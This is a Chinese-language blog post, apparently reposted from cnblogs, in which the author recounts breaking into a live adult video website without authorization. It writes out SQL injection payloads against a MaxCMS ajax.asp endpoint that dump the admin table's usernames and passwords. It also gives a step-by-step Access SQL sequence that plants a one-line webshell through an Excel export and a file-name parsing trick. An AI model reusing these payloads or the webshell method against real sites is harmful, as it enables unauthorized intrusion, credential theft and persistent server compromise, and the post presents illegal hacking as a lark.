【渗透笔记】拿下某小H网的全过程

自从班上A片小王子的7个T资源被封了以后,本小白为造福全班同学,尝试拿下个小H网,先用webrobot搜某些只有小H网才会出现的关键词

本以为直接导出放御剑里跑就行了,然并软。于是用awvs扫了一下,也没什么用。从cms下手吧放进椰树里

百度一下maxcms的漏洞看到这样一条 http://www.2cto.com/index.php/364.html发现注入点 http://www.xxxxx.com/inc/ajax.asp?action=videoscore&id=11 ,放进sqlmap里跑

当然没那么容易出了点小错误

没办法,试试最近刚学的联合注入。先猜表名,输入%20and%20exists%20(select%20*%20from%20m_manager)存在表名m_manager

把前面的*改成列名,结合前面sqlmap跑出的信息,猜到列名是m_username和m_pwd

判断列的长度,发现3为正常,4为错误,说明长度为3

%20and%201=2%20union%20select%201,2,3%20from%20m_manager,把2和3替换成m_username和m_pwd,直接爆出

好坏的cms呀

进后台了

接下来就是穿马了,结果00截断截不了,本来想在网站配置插一句话的,试了好多次都没什么用~~后台已经插坏好几个了~~正当我绝望时,好友分享给我这http://bybmo.lofter.com/post/1d6686be_8725023?sharefrom=lofter-android-4.7.3&shareto=qq

create table cmd (a varchar(50)) //建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50 NO.2insert into cmd (a) values ('一句话木马')//在表cmd的a字段插入一句话木马 NO.3select * into [a] in 'd:wwwrootxxxxwwwroot1.asa;x.xls' 'excel 4.0;' from cmd//把cmd表a的内容导出到路径d:wwwrootxxxxwwwroot\的EXCEL文件,网站物理路径可以在首页找到NO.4drop table cmd//删除建立的cmd表 http://www.XXX.com/1.asa;x.xls

发现其实影音先锋码可以直接在后台找到的

原文地址:https://www.cnblogs.com/cnhacker/p/6999101.html